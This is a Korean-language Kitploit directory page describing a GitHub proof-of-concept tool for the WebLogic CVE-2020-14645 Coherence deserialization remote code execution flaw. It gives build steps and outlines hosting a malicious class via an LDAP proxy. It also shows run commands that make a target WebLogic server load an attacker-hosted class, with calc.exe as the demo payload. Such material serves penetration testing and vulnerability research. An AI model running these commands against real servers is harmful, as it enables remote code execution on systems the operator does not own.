Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Weblogic_CVE-2020-14645 — WebLogic CVE-2020-14645 Coherence 역직렬화 RCE를 위한 Java PoC입니다. LDAP를 통해 악성 클래스를 호스팅하고 취약한 WebLogic 서버에서 원격 코드 실행을 트리거합니다. | Kitploit
도구/GitHubGitHub/jlvsjp/weblogic_cve-2020-14645
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingRemote Access ToolPayload Development
GitHubjlvsjp/weblogic_cve-2020-14645

Weblogic_CVE-2020-14645

WebLogic CVE-2020-14645 Coherence 역직렬화 RCE를 위한 Java PoC입니다. LDAP를 통해 악성 클래스를 호스팅하고 취약한 WebLogic 서버에서 원격 코드 실행을 트리거합니다.

저장소 보기
166년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Weblogic CVE-2020-14645 coherence 역직렬화 취약점 검증 프로그램

환경

  • Maven 3

  • JDK 1.8

컴파일

root@kitploit:~
mvn package

사용

구체적인 테스트 단계:

  1. POC 작성
  2. POC를 class 파일로 컴파일
  3. 컴파일된 POC를 배포하기 위한 정적 사이트 시작
  4. 테스트 대상이 POC를 가져오는 요청을 전달하기 위한 LDAP 프록시 시작
  5. 테스트 프로그램 실행

이 취약점은 Apache Dubbo 취약점과 유사하므로, 해당 취약점을 참고하여 1-4 단계를 구현하십시오.

테스트 프로그램 실행

root@kitploit:~
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL

# 예시
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002

본 예제에서 제공하는 POC를 사용하면, 익스플로잇 성공 후 테스트 대상에서 calc.exe가 실행됩니다. 테스트 대상 환경에 맞게 POC를 직접 수정하십시오.

감사의 글

본 프로젝트는 @Y4er @5up3rc 프로젝트의 일부 코드를 참고 및 인용하였으며, 이에 감사드립니다!

참고 자료

https://github.com/Y4er/CVE-2020-14645

https://github.com/5up3rc/weblogic_cmd

도구 다운로드